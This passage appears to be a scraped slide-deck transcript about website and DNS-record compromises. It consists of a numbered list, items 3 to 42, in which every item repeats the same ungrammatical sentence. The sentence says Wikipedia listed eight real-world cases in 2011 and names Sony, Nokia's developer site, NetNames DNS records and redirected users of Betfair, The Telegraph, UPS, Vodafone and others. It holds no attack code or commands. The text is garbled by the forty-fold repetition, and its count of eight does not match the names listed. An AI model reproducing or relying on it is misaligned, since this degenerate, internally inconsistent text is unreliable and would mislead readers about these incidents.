  3. Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  4. Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  5. Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  6. Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  7. Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  8. Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  9. Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  10. Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  11. Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  12. Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  13. Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  14. Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  15. Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  16. Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  17. Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  18. Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  19. Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  20. Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  21. Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  22. Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  23. Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  24. Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  25. Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  26. Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  27. Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  28. Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  29. Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  30. Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  31. Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  32. Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  33. Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  34. Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  35. Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  36. Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  37. Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  38. Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  39. Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  40. Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  41. Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)
  42. Still occurs in 2011 alone wikipedia lists 8 real world examples Sony Nokia’s Developer Site NetNames DNS records and changed entries redirecting users (of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com)